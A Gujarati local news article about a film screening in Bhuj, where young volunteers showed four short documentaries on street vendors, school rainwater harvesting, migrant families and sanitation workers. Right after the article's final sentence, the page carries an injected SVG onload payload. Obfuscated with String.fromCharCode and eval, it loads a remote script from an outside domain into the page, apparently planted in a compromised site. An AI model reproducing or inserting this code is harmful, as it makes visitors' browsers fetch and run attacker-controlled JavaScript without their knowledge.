“ભુજની વાતો “કેમેરા”ની નજરે – ભુજમા યોજાયો ફિલ્મ સ્ક્રીનિંગ કાર્યક્રમ

“ભુજની વાતો “કેમેરા”ની નજરે – ભુજમા યોજાયો ફિલ્મ સ્ક્રીનિંગ કાર્યક્રમ

આપણી આસપાસ ભુજ શહેરમાં અનેક લોકો વસે છે, અનેક પ્રવૃત્તિઓ થાય છે, વિવિધ વ્યવસાયો જોવા મળે છે, સારા નરસા અનુભવો થતા હોય છે ખરું ને ? ! ભુજની આવી જ કેટલીક વાતોને “કેમેરા”માં કંડારવાનો પ્રયાસ ‘ભુજ વીડિયો વોલન્ટીયર્સ’ તરીકે કાર્યરત ભુજના જ યુવાનોએ કર્યો ! ભુજના મુદ્દાઓ પર આ યુવાનોએ તૈયાર કરેલી ૪ શોર્ટ ડોક્યુમેન્ટરી ફિલ્મનું ભુજના યુવાનો અને નાગરિકો સાથે સ્ક્રીનિંગ કરી તેના પર ચર્ચા વિચારણા અને આગામી સમયમાં એ મુદ્દે શું કરી શકાય તેના માટે કાર્યક્રમ યોજાયો હતો.

ભુજમાં ચાલતા “હોમ્સ ઇન ધ સીટિ” પ્રકલ્પ અંતર્ગત “ભુજ બોલે છે” અને “લોકવાણી”ના સહયોગથી ‘ભુજ વીડિયો વોલન્ટીયર્સ’ આયોજિત કાર્યક્રમમાં ભુજના ફેરીયાઓ પર આધારિત “વેરીએન્સીસ – વેન્ડર એન્ડ રોડ”, શાંતિનગરની પ્રાથમિક શાળામાં ઉભા કરાયેલી રુફ રેઇન વોટર હાર્વેસ્ટિંગ સીસ્ટમ વિશે “ટ ટીપાંનો ટ”, શહેરમાં આવીને વસેલા સ્થળાંતરીત પરિવારના જીવન પર આધારિત “સ્થળાંતર” તેમજ શહેરમાં નાનું કામ કરીને શહેરને સ્વચ્છ રાખવામાં ફાળો આપનારા વર્ગ પર આધારિત “મીરર ઓફ અનટચેબલ” આ ૪ ફિલ્મનું સ્ક્રીનિંગ કરવામાં આવ્યું. આ દરેક ફિલ્મ માટે યોગદાન આપનારા યુવાન વોલન્ટીયર્સ રુકિયાબેન જત, રાજવીબેન રબારી, મધુ રાઠોડ, મયુર રાઠોડ તેમજ રોહન સોનીએ પોતાના અનુભવો વ્યક્ત કર્યા હતા.

ઉપસ્થિત નાગરિકોએ યુવાનોના પ્રથમ પ્રયત્નને બીરદાવતાં જણાવ્યું હતું કે, યુવાનોએ શહેરના છૂપાયેલા મુદ્દાઓને શોધીને તેના પર પ્રકાશ પાડવાનો પ્રયાસ કર્યો છે. એવો સૂર પણ વ્યક્ત થયો હતો કે જો નગરપાલિકાનો આ દરેક મુદ્દા પર સહકાર જરુરી છે અને તો જ શહેરના આવા મુદ્દાઓનો ઉકેલ મળી શકે તેમ છે. નાગરિકોએ સહયોગની ખાતરી આપતાં યુવાનોને ભુજને સ્પર્શતા અન્ય મુદ્દાઓ પર પણ આવી જ રીતે શોર્ટ ફિલ્મ બનાવી જાગૃતિ ફેલાવવા શુભેચ્છા પાઠવી હતી. કાર્યક્રમનું સંકલન લોકવાણીના પ્રિતિબેન સોની અને ‘ભુજ બોલે છે’ ના જય અંજારિયાએ કર્યું હતું. નાગરિકો ઉપરાંત ભુજની સંસ્થાના પ્રતિનિધિઓ પણ હાજર રહ્યા હતા.<svg/onload=eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59))>


No Comment

Comments are closed here.

Last updated on:

en_USEnglish